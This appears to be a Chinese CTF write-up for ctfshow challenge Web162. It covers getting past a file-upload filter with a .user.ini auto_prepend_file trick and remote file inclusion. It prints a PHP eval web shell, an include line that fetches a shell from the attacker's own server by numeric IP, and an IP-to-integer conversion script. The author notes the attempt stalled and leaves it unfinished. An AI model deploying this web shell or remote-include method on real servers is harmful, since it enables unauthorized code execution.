ctfshow(162)--文件上传漏洞--远程文件包含

Web162

进入界面:

思路

先传个文件测试一下过滤:
过滤了特别多符号,注意过滤了点.

我们的思路还是要先上传.user.ini文件:

php 复制代码
//修改前
GIF89a
auto_prepend_file=shell.png

//由于过滤了点,所以修改为
GIF89a
auto_prepend_file=shell

上传.user.ini文件

接下来就是上传包含一句话木马或恶意命令的shell文件。

因为过滤了点,所以我们之前的那些上传方法都不能使用。

这里学习一个新的上传方法:远程文件包含。

现在自己的服务器里写一个shell文件:

php 复制代码
<?php @eval($_POST[1]);?>

然后上传一个远程调用文件到目标靶机:

php 复制代码
GIF89a
<?=include"http://数字IP/shell"?>

这里的数字IP是指自己服务器的IP地址的纯数字形式.下面是相关脚本:

php 复制代码
#IP转换为长整型
def ip2long(ip):
    ip_list=ip.split('.') #⾸先先把ip的组成以'.'切割然后逐次转换成对应的⼆进制
    result = 0
    for i in range(4): #0,1,2,3
        result = result+int(ip_list[i])*256**(3-i)
    return result
 
#长整型转换为IP
def long2ip(long):
    floor_list = []
    num = long
    for i in reversed(range(4)):
        res = divmod(num,256**i)
        floor_list.append(str(res[0]))
        num = res[1]
    return '.'.join(floor_list)
 
print(ip2long('服务器ip地址'))

上传远程调用文件,后缀设置为.png,抓包修改文件名为shell,成功上传。访问/upload目录:
告警,大意是不允许包含外部网站的内容。

到这里卡住了,看了一些WP,说是要用flask。但是上述远程文件包含的思路是对的,使用flask的内容之后再补上。

相关推荐
其实防守也摸鱼6 分钟前
运维--怎么看接口的请求和返回
运维·学习·网络安全·网络攻击模型·burpsuite·攻防对抗·蓝队
云水一下6 小时前
DVWA从入门到精通(十八):Cryptography(密码学问题)
web安全·密码学·dvwa
菩提小狗7 小时前
每日安全情报报告 · 2026-07-09
网络安全·漏洞·cve·安全情报·每日安全
糖果店的幽灵7 小时前
安全测试从入门到精通 - 环境搭建与基础工具选择
安全·web安全
数据知道13 小时前
DNS 安全攻防:缓存投毒、DNS 隧道与检测实战
安全·网络安全·缓存·缓存投毒
其实防守也摸鱼1 天前
蓝队相关知识学习(1)---常用堡垒机和服务器
服务器·功能测试·学习·网络安全·网络攻击模型·攻防对抗·蓝队
云水一下1 天前
DVWA从入门到精通(十七):Open HTTP Redirect(开放重定向)
web安全·dvwa·开放重定向
学逆向的1 天前
汇编——数据存储模式
开发语言·汇编·网络安全
阿米亚波1 天前
【EVE-NG 实战】防火墙基础(VLAN · VRRP · NAT · ACL · 静态路由)
运维·网络·笔记·网络协议·计算机网络·网络安全·运维开发
txg6661 天前
网络安全领域简报(2026年7月3日—10日)
安全·web安全·网络安全